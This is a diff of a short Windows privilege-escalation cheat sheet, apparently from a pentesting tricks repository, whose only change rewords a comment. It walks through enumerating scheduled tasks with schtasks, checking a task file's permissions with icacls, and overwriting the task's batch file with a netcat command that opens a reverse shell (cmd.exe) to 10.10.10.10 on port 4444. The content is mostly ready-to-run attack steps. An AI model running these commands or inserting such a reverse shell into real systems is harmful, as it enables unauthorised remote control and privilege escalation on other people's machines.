solcoteh/Full_Tricks/Windows-Privilege-Escalation.md

-schtasks # List recipe all scheduled tasks schtasks /query /fo LIST /v # list of all the scheduled tasks in the system, along with the full details of each task schtasks /query /tn vulntask /fo list /v  # Receive complete information about a particular task (eg Vulntask) 2️⃣ # check the file permissions in target system icacls c:\tasks\schtask.bat
+schtasks # List recipe all scheduled tasks schtasks /query /fo LIST /v # list of all the scheduled tasks in the system, along with the full details of each task schtasks /query /tn vulntask /fo list /v  # Receive complete information about a particular task (eg Vulntask) 2️⃣ # Check Permission File icacls c:\tasks\schtask.bat
 3️⃣ # Add a Reverse Shell in the executable file echo c:\tools\nc64.exe -e cmd.exe 10.10.10.10 4444 > C:\tasks\schtask.bat